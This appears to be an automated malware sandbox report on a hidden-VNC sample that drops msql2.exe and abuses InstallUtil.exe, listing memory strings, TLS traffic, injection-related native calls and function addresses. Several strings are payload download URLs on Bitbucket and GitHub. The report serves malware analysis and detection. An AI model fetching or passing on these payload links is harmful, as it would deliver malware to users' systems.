Source: InstallUtil.exe, 00000001.00000002.4146654495.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: InstallUtil.exe, 00000001.00000002.4168769540.00000000055B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d3522d218ade2
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.00000000034CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aui-cdn.atlassian.com/
Source: msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.00000000034ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E97000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003507000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.00000000034CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org
Source: hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr String found in binary or memory: https://bitbucket.org/312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.cookielaw.org/
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr String found in binary or memory: https://github.com/mariuszgromada/MathParser.org-mXparser
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1948776469.0000000004747000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe
Source: msql2.exe.0.dr String found in binary or memory: https://mathparser.org
Source: hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr String found in binary or memory: https://mathparser.org/mxparser-license
Source: hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr String found in binary or memory: https://mathparser.org/mxparser-tutorial/confirming-non-commercial-commercial-usecWARNING:
Source: msql2.exe.0.dr String found in binary or memory: https://mathparser.org/order-commercial-license
Source: msql2.exe.0.dr String found in binary or memory: https://payhip.com/infima
Source: hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr String found in binary or memory: https://payhip.com/infima)
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2092862640.0000000002A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.30.95:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.217.90.148:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 54.231.232.1:443 -> 192.168.2.4:49743 version: TLS 1.2

System Summary
barindex
.NET source code contains very large array initializations
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.4447550.5.raw.unpack, Record.cs Large array initialization: PatchPage: array initializer size 295456
.NET source code contains very large strings
Source: hvnc-CR-SCR-0710.bin.exe, ValStructWorker.cs Long String: Length: 10317
Contains functionality to call native functions
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064FFC10 NtResumeThread, 0_2_064FFC10
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064FE288 NtProtectVirtualMemory, 0_2_064FE288
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064FFC0A NtResumeThread, 0_2_064FFC0A
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064FE280 NtProtectVirtualMemory, 0_2_064FE280
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060FFC10 NtResumeThread, 2_2_060FFC10
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060FE288 NtProtectVirtualMemory, 2_2_060FE288
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060FFC0A NtResumeThread, 2_2_060FFC0A
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060FE280 NtProtectVirtualMemory, 2_2_060FE280
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AFFC10 NtResumeThread, 5_2_06AFFC10
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AFE288 NtProtectVirtualMemory, 5_2_06AFE288
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AFFC0A NtResumeThread, 5_2_06AFFC0A
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AFE280 NtProtectVirtualMemory, 5_2_06AFE280
Detected potential crypto function
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_02DF78A0 0_2_02DF78A0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_02DF2930 0_2_02DF2930
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_02DFE648 0_2_02DFE648
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_02DFD060 0_2_02DFD060
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_02DF3751 0_2_02DF3751
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_02DF3760 0_2_02DF3760
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_06434410 0_2_06434410
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_06430A00 0_2_06430A00
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_06430D37 0_2_06430D37
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_06432018 0_2_06432018
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064A7390 0_2_064A7390
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064A5610 0_2_064A5610
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064A5690 0_2_064A5690
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064A56A0 0_2_064A56A0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064A7380 0_2_064A7380
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064A0040 0_2_064A0040
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064A0006 0_2_064A0006
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064A7939 0_2_064A7939
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064E9EE0 0_2_064E9EE0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064E9EF0 0_2_064E9EF0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064FB548 0_2_064FB548
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064F6AF0 0_2_064F6AF0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064F8088 0_2_064F8088
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064FB538 0_2_064FB538
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064F1278 0_2_064F1278
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064F7210 0_2_064F7210
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064F6ADF 0_2_064F6ADF
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064F52A8 0_2_064F52A8
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064F52A5 0_2_064F52A5
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064F8082 0_2_064F8082
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_0651877A 0_2_0651877A
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_06510040 0_2_06510040
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_06510006 0_2_06510006
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_06860007 0_2_06860007
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_06860040 0_2_06860040
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_068605C1 0_2_068605C1
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_068605D0 0_2_068605D0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_068DD890 0_2_068DD890
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_068DCCA8 0_2_068DCCA8
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_068C0007 0_2_068C0007
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_068C0040 0_2_068C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_00E04010 1_2_00E04010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_00E015A8 1_2_00E015A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_00E01598 1_2_00E01598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_00E03DDB 1_2_00E03DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056C7F40 1_2_056C7F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056C7F50 1_2_056C7F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056C7F20 1_2_056C7F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056CD668 1_2_056CD668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056C2E28 1_2_056C2E28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056C7E88 1_2_056C7E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056CB920 1_2_056CB920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056CB910 1_2_056CB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056C99E0 1_2_056C99E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056C99F9 1_2_056C99F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056C4320 1_2_056C4320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056C430F 1_2_056C430F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056C9A08 1_2_056C9A08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06910D75 1_2_06910D75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_069121A0 1_2_069121A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06911EDF 1_2_06911EDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06911F10 1_2_06911F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06912190 1_2_06912190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06948860 1_2_06948860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06964E64 1_2_06964E64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06967C77 1_2_06967C77
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06962B51 1_2_06962B51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06980040 1_2_06980040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06980267 1_2_06980267
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_069800AF 1_2_069800AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06980073 1_2_06980073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_0698019D 1_2_0698019D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_0698011D 1_2_0698011D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06993780 1_2_06993780
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_00F778A0 2_2_00F778A0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_00F72960 2_2_00F72960
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_00F7E648 2_2_00F7E648
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_00F7D060 2_2_00F7D060
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_00F73760 2_2_00F73760
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_00F73751 2_2_00F73751
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_06034410 2_2_06034410
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_06030A00 2_2_06030A00
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_06030D37 2_2_06030D37
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_06032018 2_2_06032018
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060A7390 2_2_060A7390
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060A569F 2_2_060A569F
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060A56A0 2_2_060A56A0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060A7387 2_2_060A7387
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060A0006 2_2_060A0006
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060A0040 2_2_060A0040
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060A7947 2_2_060A7947
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060E8F49 2_2_060E8F49
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060E8F58 2_2_060E8F58
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060EEDD0 2_2_060EEDD0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060EEDE0 2_2_060EEDE0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060EF370 2_2_060EF370
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060EF380 2_2_060EF380
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060FB548 2_2_060FB548
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060F6AF0 2_2_060F6AF0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060F8088 2_2_060F8088
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060FB538 2_2_060FB538
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060F7210 2_2_060F7210
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060F1278 2_2_060F1278
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060F52A8 2_2_060F52A8
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060F52A5 2_2_060F52A5
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060F6ADF 2_2_060F6ADF
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060F8082 2_2_060F8082
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_0611877A 2_2_0611877A
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_06110007 2_2_06110007
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_06110040 2_2_06110040
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_064DD890 2_2_064DD890
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_064C0040 2_2_064C0040
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_064C0006 2_2_064C0006
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_064DCCA8 2_2_064DCCA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_01504010 4_2_01504010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_01501598 4_2_01501598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_015015A8 4_2_015015A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_01501BCE 4_2_01501BCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_01501BF2 4_2_01501BF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_01501BAC 4_2_01501BAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_01501C56 4_2_01501C56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_01501C14 4_2_01501C14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_01503CEE 4_2_01503CEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_01503EC6 4_2_01503EC6
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_01AD2930 5_2_01AD2930
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_01AD78A0 5_2_01AD78A0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_01AD16D8 5_2_01AD16D8
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_01ADE648 5_2_01ADE648
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_01ADD060 5_2_01ADD060
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_01AD3760 5_2_01AD3760
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_01AD3751 5_2_01AD3751
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06A34410 5_2_06A34410
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06A30A00 5_2_06A30A00
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06A30D37 5_2_06A30D37
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06A32018 5_2_06A32018
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AA7390 5_2_06AA7390
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AA56A0 5_2_06AA56A0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AA5690 5_2_06AA5690
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AA7380 5_2_06AA7380
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AA0007 5_2_06AA0007
